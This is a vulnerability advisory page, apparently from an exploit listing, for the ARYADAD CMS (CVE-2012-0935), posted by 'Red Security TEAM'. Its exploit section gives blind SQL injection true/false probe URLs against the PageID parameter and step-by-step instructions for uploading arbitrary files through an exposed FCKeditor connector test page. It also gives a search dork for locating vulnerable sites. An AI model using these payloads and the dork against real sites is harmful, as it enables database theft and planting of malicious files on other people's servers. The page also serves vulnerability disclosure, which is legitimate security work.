ARYADAD Multiple Vulnerabilities

2012-01-22 / 2012-01-30

Credit: Red Security TEAM

Risk: High

Local: No

Remote: Yes

CVE: CVE-2012-0935

CWE: CWE-89
CWE-98

Ogólna skala CVSS: 7.5/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

#
# Title : ARYADAD Multi Vulnerability
# Author : Red Security TEAM
# Date : 21/01/2012
# Vendor : http://cms.aryadad.com/
# Tested On : Windows Server 2008 (IIS 7.5)
# Dork : Powered by ARYADAD Corporation
# Contact : Info [ 4t ] RedSecurity [ d0t ] COM
# Home : http://RedSecurity.COM
#
# Exploit :
#
# I : Blind SQL Injection Vulnerability
# True : http://server/Default.aspx?PageID=117' and 1-1 = '0
# False : http://server/Default.aspx?PageID=117' and 2-1 = '0
#
# II : File Upload Vulnerability
# 1. Go to : /FA/fckeditor/editor/filemanager/connectors/test.html
# 2. Set Connector To ASP.Net and upload your file , You can see your uploaded files in FA/userfiles/file/
#

Referencje:

http://cms.aryadad.com/

http://RedSecurity.COM/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ARYADAD Multiple Vulnerabilities

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.